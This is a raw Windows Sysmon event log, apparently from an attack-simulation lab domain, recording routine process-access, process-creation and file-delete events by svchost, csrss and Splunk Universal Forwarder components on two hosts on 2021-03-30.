16:27:24.030{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060817Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.030{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060816Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.030{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060815Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.030{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-516C-6063-1501-00000000AF01}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060814Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.030{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-516C-6063-1501-00000000AF01}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060813Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:24.031{7F8C56E7-516C-6063-1501-00000000AF01}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245505Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-516C-6063-A922-00000000AF01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245504Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245503Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245502Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245501Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245500Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245499Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245498Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245497Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245496Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245495Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-516C-6063-A922-00000000AF01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245494Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-516C-6063-A922-00000000AF01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245493Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.953{CB4067E1-516C-6063-A922-00000000AF01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245492Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.890{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=013AF116578F33C067250A12EA63E9C0,SHA256=CDA93A2C1764CB270672E17C1E82E83D7753ED329326840245409F5FB3FF3D21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245491Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.593{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFEC0BF7CAEED3944CACFA9999BE8228,SHA256=9FEF38A21C2EA7115EBDAE08C620313516DB233F0FC909601BE212425341EC42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245490Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.453{CB4067E1-516C-6063-A822-00000000AF01}3963104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245489Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-516C-6063-A822-00000000AF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245488Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245487Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245486Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245485Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245484Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\